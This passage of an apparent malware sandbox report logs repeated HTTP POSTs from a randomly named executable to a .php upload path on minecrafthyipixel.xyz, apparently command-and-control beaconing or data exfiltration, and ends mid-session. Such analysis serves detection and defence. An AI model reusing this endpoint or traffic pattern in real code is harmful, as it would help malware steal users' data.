                                                                                                                                    Apr 19, 2024 13:42:58.777519941 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    40192.168.2.449788104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:58.999324083 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:59.103987932 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:59.105281115 CEST2504OUTData Raw: 52 5a 5e 58 5c 47 54 5c 5c 5e 59 59 57 57 58 53 54 52 5f 58 54 5d 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^X\GT\\^YYWWXSTR_XT]SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2>!('03 '-Q=$2*$1;.Q4>)+;]7</%$[. X
                                                                                                                                    Apr 19, 2024 13:42:59.501168013 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:59 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ex0Kx8Q7iJOTjxFVXvMQt4ESMeYFrWn7IG1WkEEwQxjXDSCxF2CUoibLiKkuGUemnlbfiMMlV5LeiGbui8qmpxBfZs5Hn4Rfv2%2BfJgphqxC%2B7gt6XCX7jsk7hO%2BY7NuOTlyC6j%2F02mY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2631cd37bbe-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:59.501235962 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    41192.168.2.449789104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:59.764090061 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:59.868505955 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:59.868673086 CEST2512OUTData Raw: 52 5e 5e 5e 59 44 54 5f 5c 5e 59 59 57 55 58 5e 54 54 5f 5d 54 5c 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^^YDT_\^YYWUX^TT_]T\S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_2>)!+<Z$V#]';")+X%_#%= T>P)Z49$[. X -
                                                                                                                                    Apr 19, 2024 13:43:00.261042118 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:00 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXYS0fjWMqq%2F5HGYeMSHqh0ctB%2Fn7KImivRIgPATs4GIiCVxbqJEoarNjKhJUFQO4pEB5fjfNLZJ6pCGYcrzSl1WN%2Faxc1C8zBjU0g0NZCCX7UMVSlW4%2FkRmyNN0hNN%2B65XmAPWLX0U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca267da78453b-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:00.261101961 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    42192.168.2.449790104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:00.485090971 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:00.591140032 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:00.591305971 CEST2512OUTData Raw: 57 5e 5e 5b 5c 40 54 5a 5c 5e 59 59 57 54 58 53 54 55 5f 57 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^[\@TZ\^YYWTXSTU_WTXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&X*"+ &#?0>>;'\2)(S18-#T5++4#3.$[. X )
                                                                                                                                    Apr 19, 2024 13:43:00.854088068 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:00 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jPRRX7%2Bgo%2FNrpXJCPcldTlt7cv9b5PfmDvAeXoKVPg%2BDN8cE%2BRxdEpXjBGlqWGC14Ik2xfQQ3QWsdjTzuQtgYUOlVG0CRej4bbVh4qrMLTS3Z5LTdXEEyQfZUo%2B%2BeTinjYBENC%2FHBvs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca26c6de2b077-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:00.854151011 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    43192.168.2.449791104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:01.088618994 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:01.195034981 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:01.195213079 CEST2512OUTData Raw: 57 5b 5e 5e 5c 43 51 5d 5c 5e 59 59 57 5e 58 5e 54 57 5f 58 54 5a 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^^\CQ]\^YYW^X^TW_XTZS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\1!"8#$;3]1P>(1:;2;2!"W)#,(:%$[. X
                                                                                                                                    Apr 19, 2024 13:43:01.445652962 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:01 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLRRMWJFy6LpBc%2FTHeWFyXt4OgKWObGAyz8M2vOfckNcJbjoSemcYDAq%2F7Fyy%2F693h2MlTgzq2u%2F8W7S2yS5Ip6GYp1tI76bOVyXQHlb7k%2FX08eGXJjlo42wdsf2sHhhT8TCknaDKak%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2702e646768-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:01.445719004 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    44192.168.2.449792104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:01.690337896 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:01.795814037 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:01.796107054 CEST2512OUTData Raw: 52 5a 5b 59 59 43 51 59 5c 5e 59 59 57 5e 58 5b 54 5b 5f 5a 54 5c 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[YYCQY\^YYW^X[T[_ZT\S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%!](\0V43]1?8?&$%(.!16P*8$7//.$[. X
                                                                                                                                    Apr 19, 2024 13:43:02.146584988 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:02 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xdq4hPXVlfOAaOGOxVOKEQt5SIKwlmUcsfteYEbdXp4EycT8NLsuQDeWDVkVHRJz%2Fx3BKd9BfCxj21OnWvJLDoxlpiomcwxG3W4VljanJqrpVWsDyJVA7Y8T3NPsIqtVEnQ6v1g2roA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca273e918452b-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:02.146616936 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    45192.168.2.449793104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:03.511203051 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:03.616178989 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:03.737971067 CEST2192OUTData Raw: 57 54 5e 59 59 4b 54 5e 5c 5e 59 59 57 54 58 5f 54 51 5f 5e 54 5d 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^YYKT^\^YYWTX_TQ_^T]S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[&-*W"+,X00^$8*>(29'245=;7_#,,:5$[. X )


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    46192.168.2.449794104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:03.980906010 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:04.085345984 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:04.085561037 CEST2512OUTData Raw: 57 5c 5b 58 5c 40 54 5e 5c 5e 59 59 57 55 58 5f 54 55 5f 57 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[X\@T^\^YYWUX_TU_WTXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2==!($' (0+!P*;;^&91;7T*);$4<$[-5$[. X -
                                                                                                                                    Apr 19, 2024 13:43:04.342792034 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:04 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBHvbHSRVlr93wSVkaTOJFM2k702zVe%2BkdOtUOF%2BBTx1ZF8c9kNYZKFHgS6egPjxyYFGe%2FpNnjwMkYYcRx3dM3%2BjbA1KWipINeB4Wpd1gDuS6tHNCH8j3p6qu3Dtu1k4Sv9NVH%2BOwo8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2823a7c6776-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:04.342856884 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    47192.168.2.449795104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:04.563292027 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:04.667834997 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:04.668189049 CEST2512OUTData Raw: 57 5c 5b 59 5c 41 54 5f 5c 5e 59 59 57 5e 58 5c 54 50 5f 5a 54 5e 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[Y\AT_\^YYW^X\TP_ZT^S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z1>" ;;''8-V=+#&_#&+!!!=>+'_ 8-%$[. X
                                                                                                                                    Apr 19, 2024 13:43:04.919308901 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:04 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXU6NW77TsTbDRyWx3tG5Hx6DYX1t2%2BbZYZQvjbSIZLtfZQIExwnDxLBDVTYa%2BCjeaYWvmbqNEsnFqEmkC5a97egNTmN8BcpOwEgej1PVRCugA0X2IkTmy1Z6tbGx5veYPt1MEAxRLs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca285de89b06a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:04.919373035 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    48192.168.2.449796104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:05.138351917 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:05.243153095 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:05.243311882 CEST2512OUTData Raw: 57 5c 5b 5c 59 40 54 59 5c 5e 59 59 57 56 58 5d 54 5a 5f 5b 54 59 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[\Y@TY\^YYWVX]TZ_[TYS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]&=6"+8\303\'P*('X&9S%+P#+('^4.5$[. X !
                                                                                                                                    Apr 19, 2024 13:43:05.511735916 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:05 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuBbmfOd4JMaMh3vUs9bptkqN0fAOZqGX8LiJqjdVCsNgyscBwMqPL9t1Mwf%2BDcPEZ90AsfX9duRl1t0a0uxlkZhLx%2Fqkc8knDw%2BESu21Zd%2F2QDUt35MrVprU5fEpxNQpa4FNcECbUU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca28978c244f6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:05.511800051 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    49192.168.2.449797104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:05.793297052 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:05.898139000 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:05.898308992 CEST2512OUTData Raw: 57 5f 5b 5c 59 47 54 59 5c 5e 59 59 57 55 58 5e 54 5a 5f 58 54 5c 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
